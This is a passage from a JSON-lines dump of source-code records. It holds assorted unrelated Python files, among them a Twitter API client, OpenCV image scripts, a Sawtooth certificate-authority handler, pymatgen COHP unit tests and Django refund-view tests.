\"To cancel the session run:\\n\"\n ,f\"python3 code_clinic.py cancel{id_user}\",'\\n','-'*70)\n except KeyError:\n break\n\n page_token = events.get('nextPageToken')\n if not page_token:\n break\n if n < 1:\n final_string = \"You have no booked slots\\n\"\n print(final_string)\n return(final_string)\n if n == 1:\n final_string = f\"\\nYou have {n} booked slot\\n\"\n print(final_string)\n return(final_string)\n\n else:\n final_string = f\"\\nYou have {n} booked slots\\n\"\n print(final_string)\n return(final_string)\n ","sub_path":"patient/view_booking.py","file_name":"view_booking.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"537666314","text":"import sys\nimport nltk\nimport docopt\nfrom lispat_app.lispat.utils.logger import Logger\nfrom lispat_app.lispat.utils.colors import bcolors\nfrom lispat_app.lispat.base.manager import CommandManager\n\n\nlogger = Logger(\"Main\")\n\nnltk.download('stopwords')\nnltk.download('punkt')\n\ndef app_main(args, manager, file=None):\n \"\"\"\n Summary: Main function handles arguments and hands them off to the manager.\n param: args: arguments for function calls\n :return: exit code\n \"\"\"\n try:\n if args['convert'] and args['--docA'] and args['--docB']:\n docA_path = args['--docA']\n docB_path = args['--docB']\n manager.create_path(docA_path, docB_path)\n return manager.convert()\n\n if args['filter']:\n manager.filter()\n\n if args['data']:\n manager.set_json()\n data = manager.get_json()\n return data\n\n if args['graph']:\n manager.graph()\n\n if args['all']:\n doc_path = file\n manager.create_path(file)\n manager.convert()\n manager.filter()\n manager.set_json()\n\n if args['clean']:\n manager.clean()\n\n except KeyboardInterrupt:\n logger.getLogger().error(bcolors.FAIL + \"Keyboard interrupt. Exiting\"\n + bcolors.ENDC)\n sys.exit(1)\n\n\n### DEPRECATED ##################################\n# if args['analytics'] and args['--path']:\n# user_path = args['--path']\n# manager.create_path(user_path)\n# manager.run_analytics(args)\n#\n# if args['compare'] and args['--standard'] and args['--submission']:\n# std_path = args['--standard']\n# sub_path = args['--submission']\n#\n# manager.create_path(std_path, sub_path)\n#\n# html_file = manager.run_sub_vs_std(args)\n# #return html_file\n#\n# if args['compare'] and args['input'] and args['--standard']:\n# print(args['--text'])\n# std_path = args['--standard']\n# print(std_path)\n# manager.create_path(std_path)\n# manager.run_sub_vs_txt(args)\n#\n\n\n\nif __name__ == '__main__':\n app_main(sys.argv)\n","sub_path":"lispat_app/lispat/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"72516483","text":"from SimpleCV import Camera, Display, Image\n#import numpy as N\n#import sklearn as sk\nfrom sklearn import *\n#from scipy.sparse import *\n#from scipy import *\nfrom matplotlib import pylab\n\n\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n#from sklearn.utils.validation import check_arrays\n#from skimage import data\n#from skimage import filters # \n\n\n\n\nc = Camera()\n\ndef foto(c):\n img = c.getImage()\n img.show()\n return img\n\n\n#a=foto(c)\n\n\na=Image(\"hola5Gray.png\")\nimgGray=a\n##imgGray=a.grayscale()\n#imgGray.save(\"hola42AGray.png\")\n#a.save(\"holaA42.png\")\n\ndef histograma(hist):\n \n hist=hist.histogram(255)\n## hist.save(\"hola4Hist.txt\")\n pylab.plot(hist)\n pylab.draw()\n pylab.pause(0.0001)\n\n\n##b=histograma(imgGray)\n\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('hola5Gray.png',0)\nimg = cv2.medianBlur(img,5)\n\nret,th1 = cv2.threshold(img,60,255,cv2.THRESH_BINARY)\nth2 = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_MEAN_C,\\\n cv2.THRESH_BINARY,11,2)\nth3 = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\\\n cv2.THRESH_BINARY,11,2)\n\ntitles = ['Original Image', 'Global Thresholding (v = 127)',\n 'Adaptive Mean Thresholding', 'Adaptive Gaussian Thresholding']\nimages = [img, th1, th2, th3]\n\nfor i in xrange(4):\n plt.subplot(2,2,i+1),plt.imshow(images[i],'gray')\n plt.title(titles[i])\n plt.xticks([]),plt.yticks([])\nplt.show()\n\n\n\n\n\n","sub_path":"cosa8.py","file_name":"cosa8.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"242928925","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# twitter_app.py\n# \n# Copyright 2016 Keliomer <keliomer@gmail.com>\n# \n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n# \n# \n\nimport requests, requests_oauthlib, sys, csv, json\n\nwith open('credentials.csv') as creds:\n reader = csv.DictReader(creds)\n for row in reader:\n consumer_key = row['API Key']\n consumer_secret = row['API Secret']\n access_token = row['Access Token']\n access_secret = row['Token Secret']\n\ndef init_auth():\n auth_obj = requests_oauthlib.OAuth1(\n consumer_key, consumer_secret,\n access_token, access_secret)\n \n if verify_credentials(auth_obj):\n print('Validation Complete')\n return auth_obj\n else:\n print('HALT WHO GOES THERE')\n sys.exit(1)\ndef verify_credentials(auth_obj):\n url = 'https://api.twitter.com/1.1/'\\\n 'account/verify_credentials.json'\n response = requests.get(url, auth=auth_obj)\n return response.status_code == 200\n \ndef get_mentions(since_id, auth_obj):\n params = {'count': 200, 'since_id': since_id,\n 'include_rts': 0, 'include_entities': 'false'}\n url = 'https://api.twitter.com/1.1/' \\\n 'statuses/mentions_timeline.json'\n response = requests.get(url,params=params,auth=auth_obj)\n response.raise_for_status()\n return json.loads(response.text)\n \n\nif __name__ == '__main__':\n auth_obj = init_auth()\n since_id = 1\n for tweet in get_mentions(since_id, auth_obj):\n print(tweet['text'])\n \n\n","sub_path":"twitter_app.py","file_name":"twitter_app.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"243277646","text":"#!/usr/bin/env python\nfrom sakura.daemon.processing.operator import InternalOperator\nfrom .stream import FragmentSourceStream\n\n# This internal operator (not accessible from users)\n# is used when a user links 2 operators running in\n# 2 differents daemons. As a result, each daemon\n# is running a fragment of the workflow, and the\n# hub, together with this operator, passes the data\n# between these fragments.\n# The FragmentSourceOperator is internally added as\n# a source of the 2nd workflow fragment.\n# It pulls data from the hub (and the hub pulls data\n# from the output of the 1st fragment) and passes this\n# data to the next operator of the 2nd fragment.\n\nFRAGMENT_BUFFER = 1000\n\nclass FragmentSourceOperator(InternalOperator):\n def __init__(self, hub, remote_op_id, remote_out_id):\n super().__init__()\n remote_op = hub.context.op_instances[remote_op_id]\n self.remote_out_stream = remote_op.output_streams[remote_out_id]\n def construct(self):\n # just one output, copy info from remote stream\n self.output_stream = self.register_output(\n FragmentSourceStream(self.remote_out_stream))\n","sub_path":"sakura/operators/internal/fragmentsource/operator.py","file_name":"operator.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"440780331","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os, re\nfrom collections import Counter\nimport pymorphy2\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\n\ndef read_from_file(name): #функция, которая читает текст из файла\n file = open(name, 'r', encoding='utf-8')\n text = file.read()\n file.close()\n return text\n\ndef get_words(text): #функция, которая создает и возвращает список слов из текста\n return [word.lower() for word in re.findall(r'[а-яёА-ЯЁa-zA-Z-]+', text) if word[0] != '-']\n\ndef o_lemma_list(s): #функция, которая создает из списка слов список лемм, где ровно 2 \"о\", и преобразует его в удобный вид для записи в .txt\n wordlist = get_words(s)\n morph = pymorphy2.MorphAnalyzer()\n lemmlist = []\n for w in wordlist:\n lemma = morph.parse(w)[0].normal_form\n if len(re.findall('о', lemma)) == 2:\n lemmlist.append(lemma)\n return '\\n'.join(lemmlist)\n\ndef json_file_content(link): #функция, которая скачивает текст с web-страницы, делит его на слова, создает частотный словарь и записывает его в .json\n text = BeautifulSoup(requests.get(link).text, \"html.parser\").getText()\n wordlist = get_words(text)\n freqdict = Counter(wordlist)\n json_data = json.dumps(freqdict, ensure_ascii=False)\n return json_data\n\ndef write_to_file(name, s, filetype): #функция, которая записывает переданные ей данные в файл заданного формата\n file = open(name + filetype, 'w')\n file.write(s)\n file.close()\n\ndef main():\n wdir = input('Рабочая директория> ')\n os.chdir(wdir)\n name = input('Имя файла (без расширения)> ')\n text = read_from_file(name + '.txt')\n\n write_to_file(name+'_lemms', o_lemma_list(text), '.txt')\n print('Cписок лемм создан')\n\n link = 'http://lib.ru/POEZIQ/PESSOA/lirika.txt'\n\n write_to_file(name+'_json', json_file_content(link), '.json')\n print('JSON-словарь создан')\n\nmain()\n","sub_path":"balueva-2.py","file_name":"balueva-2.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"207518547","text":"import logging\r\n\r\nfrom sawtooth_sdk.processor.exceptions import InvalidTransaction, InternalError\r\nfrom sawtooth_sdk.processor.handler import TransactionHandler\r\nfrom sawtooth_sdk.protobuf.processor_pb2 import TpProcessRequest\r\n\r\nfrom ApproveState import ApproveState\r\nfrom CaPayload import CaPayload\r\nfrom CaState import CaState\r\n\r\nLOGGER = logging.getLogger(__name__)\r\n\r\n\r\nclass CAHandler(TransactionHandler):\r\n\r\n def __init__(self, namespace_prefix):\r\n self._namespace_prefix = namespace_prefix\r\n\r\n @property\r\n def family_name(self):\r\n return 'CA'\r\n\r\n @property\r\n def namespaces(self):\r\n return [self._namespace_prefix]\r\n\r\n @property\r\n def family_versions(self):\r\n return ['1.0']\r\n\r\n def apply(self, transaction: TpProcessRequest, context):\r\n LOGGER.debug('[apply] init header and signer')\r\n header = transaction.header\r\n signer = header.signer_public_key\r\n try:\r\n LOGGER.debug('[apply] create CaState, ApproveState, CaPayload')\r\n state = CaState(context=context, namespace=self._namespace_prefix, timeout=2)\r\n astate = ApproveState(context=context, namespace=self._namespace_prefix, timeout=2)\r\n # state.check_CA_cert()\r\n payload = CaPayload(payload=transaction.payload)\r\n\r\n if payload.action == 'init':\r\n state.init_CA_cert(date=payload.date,\r\n nonce=int(header.nonce, 0),\r\n spkey=payload.value,\r\n csr=payload.csr,\r\n signer=signer)\r\n elif payload.action == 'create':\r\n astate.add_csr_request(date=payload.date, nonce=int(header.nonce, 0), csr=payload.value, signer=signer)\r\n elif payload.action == 'list_approve':\r\n if state.admin == signer:\r\n t_bytes = astate.get_list().encode()\r\n event_name = \"{}/list_approve\".format(self._namespace_prefix)\r\n self._fire_event(context, event_name, {}, t_bytes)\r\n elif payload.action == 'list_my':\r\n lc = astate.get_my_certificate(signer).encode()\r\n event_name = \"{}/list_my\".format(self._namespace_prefix)\r\n self._fire_event(context,\r\n event_name,\r\n {\"signer\": \"{}\".format(signer)}.items(),\r\n lc)\r\n elif payload.action == 'approve':\r\n if state.admin == signer:\r\n d, n, c = astate.approve(payload.serial)\r\n cert_bytes, cert_serial = state.create_certificate(date=d, nonce=n, csr=c)\r\n astate.save_certificate(payload.serial, cert_serial)\r\n\r\n elif payload.action == 'get':\r\n cert_bytes = state.get_certificate(payload.serial)\r\n event_name = \"{}/get\".format(self._namespace_prefix)\r\n self._fire_event(context,\r\n event_name,\r\n {\"serial\": \"{}\".format(payload.serial)}.items(),\r\n cert_bytes)\r\n elif payload.action == 'revoke':\r\n state.revoke_certificate(payload.serial)\r\n event_name = \"{}/revoke\".format(self._namespace_prefix)\r\n self._fire_event(context,\r\n event_name,\r\n {\"serial\": \"{}\".format(payload.serial)}.items())\r\n elif payload.action == 'status':\r\n status = state.check_status(payload.serial)\r\n event_name = \"{}/status\".format(self._namespace_prefix)\r\n self._fire_event(context,\r\n event_name,\r\n {\"serial\": \"{}\".format(payload.serial)}.items(),\r\n status.encode('utf-8'))\r\n else:\r\n raise InvalidTransaction(\"Transaction payload type unknown.\")\r\n except InternalError as er:\r\n raise InvalidTransaction(str(er)) from er\r\n except BaseException as ex:\r\n raise InvalidTransaction(str(ex)) from ex\r\n\r\n def _fire_event(self, context, event_name, filters, data=None):\r\n LOGGER.debug(\"fire event \" + event_name)\r\n context.add_event(event_name,\r\n filters,\r\n data)\r\n LOGGER.debug(\"event {} fired\".format(event_name))\r\n\r\ndef _display(msg):\r\n n = msg.count(\"\\n\")\r\n\r\n if n > 0:\r\n msg = msg.split(\"\\n\")\r\n length = max(len(line) for line in msg)\r\n else:\r\n length = len(msg)\r\n msg = [msg]\r\n\r\n LOGGER.debug(\"+\" + (length + 2) * \"-\" + \"+\")\r\n for line in msg:\r\n LOGGER.debug(\"+ \" + line.center(length) + \" +\")\r\n LOGGER.debug(\"+\" + (length + 2) * \"-\" + \"+\")\r\n","sub_path":"docker/bchainca-tp/bchainca/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"561255466","text":"\"\"\"\nWebcam Sketch\n\nHaving fun generating a line drawing of the live webcam. Requires a webcam (obviously), and OpenCV. Python 3\n\"\"\"\nimport cv2\nimport numpy as np\n\n# Our sketch generating function\ndef sketch(image):\n # Convert image to grayscale\n img_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n \n # Clean up image using Guassian Blur\n img_gray_blur = cv2.GaussianBlur(img_gray, (5,5), 0)\n \n # Extract edges\n canny_edges = cv2.Canny(img_gray_blur, 10, 90)\n \n kernel = np.ones((3,3), np.uint8)\n dilation = cv2.dilate(canny_edges, kernel, iterations = 1)\n \n # Do an invert binarize the image \n mask = cv2.bitwise_not(dilation)\n mask = cv2.bitwise_or(mask, img_gray) # adds an interesting gray effect\n return mask\n\n\n# Initialize webcam, cap is the object provided by VideoCapture\n# It contains a boolean indicating if it was sucessful (ret)\n# It also contains the images collected from the webcam (frame)\ncap = cv2.VideoCapture(0)\n\nprint('Press Enter to exit')\nwhile True:\n try:\n ret, frame = cap.read()\n cv2.imshow('Our Live Sketcher', sketch(frame))\n if cv2.waitKey(1) == 13: #13 is the Enter Key\n break\n except:\n # Release camera and close windows\n cap.release()\n cv2.destroyAllWindows()\n\n# Release camera and close windows\ncap.release()\ncv2.destroyAllWindows()","sub_path":"webcam_sketch.py","file_name":"webcam_sketch.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"29542882","text":"from collections import deque\n\ndef earliest_ancestor(ancestors, starting_node):\n # reverse the tuples direction of edges for ancestors\n # so you can traverse only to older generations\n lis = [tup[::-1] for tup in ancestors]\n\n # create the directed graph\n graph = {}\n for tup in lis:\n if tup[0] in graph:\n graph[tup[0]].add(tup[1])\n else:\n graph[tup[0]] = {tup[1]}\n if tup[1] in graph:\n continue\n else:\n graph[tup[1]] = set()\n\n # do a depth first traversal for the starting node\n stack = deque([[starting_node]])\n visited = set()\n # keep track of the longest traversal/path, or earliest ancestor path\n longest_path = []\n while len(stack)>0:\n path = stack.pop()\n v = path[-1]\n if v not in visited:\n visited.add(v)\n # check if has no ancestors\n if not graph[v]:\n if len(path)>len(longest_path):\n if not longest_path:\n longest_path = path \n if path[-1] > longest_path[-1]:\n longest_path = path\n for n in graph[v]:\n stack.append(path + [n])\n\n # return the earliest ancestor or -1 if starting node doesn't have any ancestors\n ancestor = longest_path[-1]\n return -1 if ancestor==starting_node else ancestor\n\n\ntest = [(1, 3), (2, 3), (3, 6), (5, 6), (5, 7), (4, 5), (4, 8), (8, 9), (11, 8), (10, 1)]\nprint(earliest_ancestor(test, 2))","sub_path":"projects/ancestor/ancestor.py","file_name":"ancestor.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"397108174","text":"\n\nfrom xai.brain.wordbase.nouns._neophyte import _NEOPHYTE\n\n#calss header\nclass _NEOPHYTES(_NEOPHYTE, ):\n\tdef __init__(self,): \n\t\t_NEOPHYTE.__init__(self)\n\t\tself.name = \"NEOPHYTES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"neophyte\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_neophytes.py","file_name":"_neophytes.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"202648582","text":"from .base_agent import BaseAgent\n\n\nclass UserAgent(BaseAgent):\n '''Human Agent'''\n\n def __init__(self, game_id, player):\n super().__init__(game_id, player)\n\n def get_state(self):\n '''Gets current board state'''\n if self.game_over:\n return {'end': True}\n data = self.request('GET', f'/v1.0/games/{ self.game_id }')\n return data['state']\n\n def play_round(self, move):\n if move is None:\n return\n proposal = self.get_state()\n if isinstance(proposal, dict):\n return\n proposal = list(map(list, map(bytes.fromhex, proposal)))\n proposal[move[1][0]][move[1][1]] = proposal[move[0][0]][move[0][1]]\n proposal[move[0][0]][move[0][1]] = 0\n return self.put_board(tuple(map(bytes, proposal)))\n","sub_path":"neuralknight/models/user_agent.py","file_name":"user_agent.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"417607613","text":"# https://bigocoder.com/courses/OBLUE01/OBLUE01_LEC18/BLUE_L18P03_2\n\ndef findSet(u):\n if parent[u] != u:\n parent[u] = findSet(parent[u])\n return parent[u]\n\ndef unionSet(u,v):\n up = findSet(u)\n vp = findSet(v)\n if up == vp:\n return\n if rank[up] > rank[vp]:\n parent[vp] = up\n elif rank[up] < rank[vp]:\n parent[up] = vp\n else:\n parent[up] = vp\n rank[vp] += 1\n\ncase = 1\n\nwhile True:\n n,m = map(int, input().split())\n\n if n == 0 and m == 0:\n break\n\n rank = [0 for i in range(n)]\n parent = [i for i in range(n)]\n\n for i in range(m):\n p1,p2 = map(int, input().split())\n unionSet(p1-1, p2-1)\n \n group = [0 for i in range(n)]\n\n for i in range(n):\n group[findSet(i)] += 1\n \n count = 0\n for i in range(n):\n if group[i]:\n count += 1\n print('Case ' + str(case) + ': ' + str(count))\n case += 1","sub_path":"BigO/Blue/Lecture18_FinalExam/UbiquitousReligions.py","file_name":"UbiquitousReligions.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"563489409","text":"from fastapi import HTTPException\n\n\nclass BadRequest(HTTPException):\n \"\"\"400 Bad Request\"\"\"\n\n def __init__(\n self,\n status_code: int = 400,\n detail: str = None,\n headers: dict = None,\n title: str = \"Bad Request\",\n ) -> None:\n super().__init__(status_code=status_code, detail=detail, headers=headers)\n self.title = title\n","sub_path":"optimade/server/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"377951682","text":"import argparse\n\nfrom meipai.api import MeiPai\nfrom .cache import get_last_page\nfrom .player import Player\n\n__author__ = 'PyBeaner'\n\n\ndef play(query, videos=None):\n videos = videos if videos else MeiPai().search(query)\n all_played = True\n for video in videos:\n if not Player.played(video):\n Player.play(video)\n all_played = False\n break\n if all_played:\n print('正在加载视频数据')\n videos = MeiPai().search(query, page=get_last_page(query, 'mv') + 1)\n if not videos:\n print(\"没有更多关于\" + query + \"的视频了\")\n return\n return play(query, videos)\n\n\ndef start():\n parser = argparse.ArgumentParser()\n parser.add_argument('query')\n parser.add_argument('--topic', action='store_true', help='搜索话题')\n args = parser.parse_args()\n query = args.query\n if args.topic:\n query = '#' + query + '#'\n\n play(query)\n\n\nif __name__ == '__main__':\n start()\n\n # topic_names = api.search('萌宠', 'topic')\n # print(topic_names)\n # topic = Topic(random.choice(topic_names))\n # print(topic.name, topic.topic_id)\n","sub_path":"meipai/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"642626489","text":"# coding: utf-8\n# Copyright (c) Pymatgen Development Team.\n# Distributed under the terms of the MIT License.\n\nfrom __future__ import division, unicode_literals\nimport unittest\nimport json\nimport os\nfrom pymatgen.electronic_structure.cohp import CompleteCohp, Cohp\nfrom pymatgen.electronic_structure.core import Spin\nfrom pymatgen.util.testing import PymatgenTest\n\ntest_dir = os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"..\",\n \"test_files\", \"cohp\")\n\n\nclass CohpTest(unittest.TestCase):\n def setUp(self):\n with open(os.path.join(test_dir, \"cohp.json\"), \"r\") as f:\n self.cohp = Cohp.from_dict(json.load(f))\n self.cohp_only = Cohp(self.cohp.efermi,\n self.cohp.energies,\n self.cohp.cohp)\n with open(os.path.join(test_dir, \"coop.json\"), \"r\") as f:\n self.coop = Cohp.from_dict(json.load(f))\n\n def test_as_from_dict(self):\n with open(os.path.join(test_dir, \"cohp.json\"), \"r\") as f:\n cohp_dict = json.load(f)\n self.assertEqual(self.cohp.as_dict(), cohp_dict)\n\n def test_attributes(self):\n self.assertEqual(len(self.cohp.energies), 301)\n self.assertEqual(self.cohp.efermi, 9.75576)\n self.assertEqual(self.coop.efermi, 5.90043)\n self.assertFalse(self.cohp.are_coops)\n self.assertTrue(self.coop.are_coops)\n\n def test_get_icohp(self):\n self.assertEqual(self.cohp.get_icohp(),\n self.cohp.get_cohp(integrated=True))\n self.assertEqual(None, self.cohp_only.get_icohp())\n\n def test_get_interpolated_value(self):\n # icohp_ef are the ICHOP(Ef) values taken from\n # the ICOHPLIST.lobster file.\n icohp_ef_dict = {Spin.up: -0.10218, Spin.down: -0.19701}\n icoop_ef_dict = {Spin.up: 0.24714}\n icohp_ef = self.cohp.get_interpolated_value(self.cohp.efermi,\n integrated=True)\n icoop_ef = self.coop.get_interpolated_value(self.coop.efermi,\n integrated=True)\n self.assertAlmostEqual(icohp_ef_dict, icohp_ef)\n self.assertAlmostEqual(icoop_ef_dict, icoop_ef)\n with self.assertRaises(ValueError):\n self.cohp_only.get_interpolated_value(5.0, integrated=True)\n\n def test_str(self):\n with open(os.path.join(test_dir, \"cohp.str\"), \"rt\") as f:\n str_cohp = f.read()\n with open(os.path.join(test_dir, \"coop.str\"), \"rt\") as f:\n str_coop = f.read()\n self.assertEqual(self.cohp.__str__(), str_cohp)\n self.assertEqual(self.coop.__str__(), str_coop)\n\n\nclass CompleteCohpTest(PymatgenTest):\n def setUp(self):\n filepath = os.path.join(test_dir, \"complete_cohp_lobster.json\")\n with open(filepath, \"r\") as f:\n self.cohp_lobster_dict = CompleteCohp.from_dict(json.load(f))\n filepath = os.path.join(test_dir, \"complete_coop_lobster.json\")\n with open(filepath, \"r\") as f:\n self.coop_lobster_dict = CompleteCohp.from_dict(json.load(f))\n filepath = os.path.join(test_dir, \"complete_cohp_lmto.json\")\n with open(filepath, \"r\") as f:\n self.cohp_lmto_dict = CompleteCohp.from_dict(json.load(f))\n\n filepath = os.path.join(test_dir, \"COPL.BiSe\")\n structure = os.path.join(test_dir, \"CTRL.BiSe\")\n self.cohp_lmto = CompleteCohp.from_file(\"lmto\", filename=filepath,\n structure_file=structure)\n filepath = os.path.join(test_dir, \"COHPCAR.lobster\")\n structure = os.path.join(test_dir, \"POSCAR\")\n self.cohp_lobster = CompleteCohp.from_file(\"lobster\",\n filename=filepath,\n structure_file=structure)\n filepath = os.path.join(test_dir, \"COOPCAR.lobster.BiSe\")\n structure = os.path.join(test_dir, \"POSCAR.BiSe\")\n self.coop_lobster = CompleteCohp.from_file(\"lobster\",\n filename=filepath,\n structure_file=structure,\n are_coops=True)\n\n def test_attiributes(self):\n self.assertFalse(self.cohp_lobster.are_coops)\n self.assertFalse(self.cohp_lobster_dict.are_coops)\n self.assertFalse(self.cohp_lmto.are_coops)\n self.assertFalse(self.cohp_lmto_dict.are_coops)\n self.assertTrue(self.coop_lobster.are_coops)\n self.assertTrue(self.coop_lobster_dict.are_coops)\n self.assertEqual(len(self.cohp_lobster.energies), 301)\n self.assertEqual(len(self.cohp_lmto.energies), 801)\n self.assertEqual(len(self.coop_lobster.energies), 241)\n self.assertEqual(self.cohp_lobster.efermi, 9.75576)\n self.assertEqual(self.cohp_lmto.efermi, -2.3433)\n self.assertEqual(self.coop_lobster.efermi, 5.90043)\n\n def test_dict(self):\n # The json files are dict representations of the COHPs from the LMTO\n # and LOBSTER calculations and should thus be the same.\n\n self.assertEqual(self.cohp_lobster.as_dict(),\n self.cohp_lobster_dict.as_dict())\n\n # Testing the LMTO dicts will be more involved. Since the average\n # is calculated and not read, there may be differences in rounding\n # with a very small number of matrix elements, which would cause the\n # test to fail\n for key in [\"COHP\", \"ICOHP\"]:\n self.assertArrayAlmostEqual(\n self.cohp_lmto.as_dict()[key][\"average\"][\"1\"],\n self.cohp_lmto_dict.as_dict()[key][\"average\"][\"1\"], 5)\n for key in self.cohp_lmto.as_dict():\n if key not in [\"COHP\", \"ICOHP\"]:\n self.assertEqual(self.cohp_lmto.as_dict()[key],\n self.cohp_lmto_dict.as_dict()[key])\n else:\n for bond in self.cohp_lmto.as_dict()[key]:\n if bond != \"average\":\n self.assertEqual(self.cohp_lmto.as_dict()[key][bond],\n self.cohp_lmto_dict.as_dict()[key][bond])\n\n def test_icohp_values(self):\n # icohp_ef are the ICHOP(Ef) values taken from\n # the ICOHPLIST.lobster file.\n icohp_ef_dict = {\"Fe8-Fe7\": {Spin.up: -0.10218, Spin.down: -0.19701},\n \"Fe8-Fe9\": {Spin.up: -0.28485, Spin.down: -0.58279}}\n all_cohps_lobster = self.cohp_lobster.all_cohps\n for bond in icohp_ef_dict:\n icohp_ef = all_cohps_lobster[bond].get_interpolated_value(\n self.cohp_lobster.efermi, integrated=True)\n self.assertEqual(icohp_ef_dict[bond], icohp_ef)\n\n icoop_ef_dict = {\"Bi1-Se7\": {Spin.up: 0.14245},\n \"Bi1-Se10\": {Spin.up: -0.04118},\n \"Bi2-Se8\": {Spin.up: 0.14245},\n \"Bi2-Se9\": {Spin.up: -0.04118},\n \"Bi3-Se10\": {Spin.up: -0.03516},\n \"Bi3-Se11\": {Spin.up: 0.10745},\n \"Bi4-Se9\": {Spin.up: -0.03516},\n \"Bi4-Se12\": {Spin.up: 0.10745},\n \"Bi5-Se12\": {Spin.up: -0.12395},\n \"Bi5-Bi6\": {Spin.up: 0.24714},\n \"Bi6-Se11\": {Spin.up: -0.12395}}\n all_coops_lobster = self.coop_lobster.all_cohps\n for bond in icoop_ef_dict:\n icoop_ef = all_coops_lobster[bond].get_interpolated_value(\n self.coop_lobster.efermi, integrated=True)\n self.assertEqual(icoop_ef_dict[bond], icoop_ef)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"pymatgen/electronic_structure/tests/test_cohp.py","file_name":"test_cohp.py","file_ext":"py","file_size_in_byte":7792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"53830061","text":"from django.conf import settings\nfrom django.test import TestCase\nimport glob, os\n\nfrom .forms import RefunderForm\n\nclass NewRefundPageTest(TestCase):\n\n def test_uses_home_template(self):\n response = self.client.get('/')\n self.assertTemplateUsed(response, 'home.html')\n\n def test_uses_refunder_from(self):\n response = self.client.get('/')\n self.assertIsInstance(response.context['form'], RefunderForm)\n\nclass RefundPageTest(TestCase):\n\n def tearDown(self):\n for f in glob.glob(os.path.join(settings.BASE_DIR, 'refunder/files/*')):\n os.remove(f)\n \n def test_POST_to_refund_with_invalid_data_renders_new_refund_page(self):\n response = self.client.post('/refund')\n\n self.assertIn('What type of account is this?', (response.content).decode('utf-8'))\n self.assertIn('start_refund', (response.content).decode('utf-8'))\n\n def test_POST_with_invalid_keys_redirects_to_home_page(self):\n dummy_file = os.path.join(settings.BASE_DIR, 'functional_tests/dummy_source.csv')\n\n with open(dummy_file) as fp:\n response = self.client.post('/refund', {'environment': 'sandbox', 'merchant_id': 'asdf', 'public_key': 'asdf', 'private_key': 'asdf', 'source_csv': fp})\n\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'home.html')\n self.assertIn('start_refund', (response.content).decode('utf-8'))\n\n def test_POST_to_refund_with_valid_data_redirects_to_refunding_page(self):\n dummy_file = os.path.join(settings.BASE_DIR, 'functional_tests/dummy_source.csv')\n VALID_KEYS = [os.getenv(\"BT_ENVIRONMENT\"), os.getenv(\"BT_MERCHANT_ID\"), os.getenv(\"BT_PUBLIC_KEY\"), os.getenv(\"BT_PRIVATE_KEY\")] \n\n with open(dummy_file) as fp:\n response = self.client.post('/refund', {'environment': VALID_KEYS[0], 'merchant_id': VALID_KEYS[1], 'public_key': VALID_KEYS[2], 'private_key': VALID_KEYS[3], 'source_csv': fp})\n\n for f in glob.glob(os.path.join(settings.BASE_DIR, 'refunder/files/' + VALID_KEYS[1] + '*')):\n log_file_name = f\n\n self.assertRedirects(response, '/refunding/' + os.path.basename(log_file_name) + 